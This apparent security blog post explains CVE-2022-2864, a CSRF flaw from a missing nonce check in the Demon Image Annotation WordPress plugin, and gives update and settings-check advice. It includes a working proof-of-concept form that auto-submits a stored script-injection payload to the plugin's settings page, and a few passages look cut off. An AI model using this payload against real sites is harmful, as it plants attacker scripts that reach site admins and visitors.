CVE-2022-2864 - How a Missing Nonce in Demon Image Annotation Plugin Opened Thousands of WordPress Sites to CSRF

If you use WordPress to host your website, plugins are a double-edged sword: they can boost your site's functionality, but with the wrong code, also put you and your visitors at risk. In this post, we’ll break down CVE-2022-2864, a Cross-Site Request Forgery (CSRF) vulnerability in the Demon Image Annotation plugin found in versions up to 4.7. We’ll keep things simple so even if you aren't a security expert, you’ll understand what’s going on—and what you can do about it.

Vulnerability Type: CSRF (Cross-Site Request Forgery)

- Weak Point: Missing nonce verification in ~/includes/settings.php
- Impact: Unauthenticated bad actors can trick logged-in admins into changing plugin settings or injecting malicious JavaScript

What is Demon Image Annotation?

Demon Image Annotation lets users add markers and comments to images on WordPress sites. It’s handy for tutorials, maps, or image-based guides, but its popularity also made it a potential target for attackers.

Understanding CSRF

CSRF stands for Cross-Site Request Forgery: an attack where a malicious website causes your browser to send requests (such as changing settings) to another site (for which you’re logged in), without your consent.

Think of it like this: you’re logged in as an admin on your WordPress site. You visit a shady webpage in another tab, and that page secretly sends commands using your login session, possibly causing chaos.

The Missing Nonce (And Why That’s Bad)

WordPress uses something called a “nonce” (a one-time token) to verify that requests to forms or settings come from real users, not from somewhere else on the internet. Unfortunately, in the affected versions of Demon Image Annotation, the code handling settings requests in ~/includes/settings.php didn’t verify the nonce.

Here’s what the dangerous code looked like (simplified for clarity)

// ~/includes/settings.php (affected versions)
if(isset($_POST['submit'])) {
    update_option('demon_image_annotation_option1', $_POST['option1']);
    update_option('demon_image_annotation_option2', $_POST['option2']);
    // ... more options
}

Notice there is no check like

if (!isset($_POST['demon_nonce']) || !wp_verify_nonce($_POST['demon_nonce'], 'settings_save')) {
    die('Security check failed');
}

This means any website could send a POST request to the plugin's settings page, and if an admin was logged in, the plugin would simply process it—no questions asked.

Let’s look at how a hacker might use this vulnerability

1. Create a Malicious Webpage: On their own server, the attacker puts up a hidden form or script that makes a request to your /wp-admin/options-general.php?page=demon-image-annotation page.
2. Bait the Admin: They trick a WordPress admin into visiting their page (perhaps via email, a comment, or social engineering).
3. Auto-Submit a Request: The attacker’s page auto-submits a POST request to the vulnerable settings endpoint, tweaking settings, or injecting JavaScript as "option" text.
4. Result: The next time a visitor loads a page using the Demon Image Annotation plugin, they might see weird popups, redirections, or worse—because the plugin is now running malicious scripts.

Example Exploit Code (Proof of Concept)

If you’re an admin logged into your website, and you visit a malicious page containing the following:

<form action="https://yourwordpresssite.com/wp-admin/options-general.php?page=demon-image-annotation"; method="POST" id="csrfExploit">
  <input type="hidden" name="option1" value="<script>alert('Hacked!');</script>">
  <input type="hidden" name="option2" value="something else">
  <input type="hidden" name="submit" value="1">
</form>
<script>
  document.getElementById('csrfExploit').submit();
</script>

If the plugin’s settings page doesn’t check for a nonce, it will blindly accept these values and save them. Congratulations, you’ve been hacked!

Full site compromise.

All of these are bad news, considering many WordPress admins run their business or blogs on these sites!

Mitigation

1. Update Immediately: The developer has fixed the issue in newer releases (post-4.7). Update from within your WordPress dashboard or download the latest version.

Verify Plugin Security: Always check plugins for recent updates and reviews.

3. Check Your Settings: If you’re concerned you may have been exploited, look at the Demon settings for strange values.

References

- NVD listing for CVE-2022-2864
- WPScan vulnerability entry
- Plugin homepage
- OWASP CSRF explanation

Final Thoughts

Open-source code is amazing, but always remember: regularly update your plugins, check for vulnerabilities, and don’t trust just any plugin. If you’re a plugin developer, remember to use WordPress nonces on every settings page!

If you believe your site may have been affected, following our mitigation steps could save you hours (or dollars!) in cleanup. Stay alert and stay secure.

Timeline

Published on: 10/28/2022 17:15:00 UTC
Last modified on: 10/31/2022 18:54:00 UTC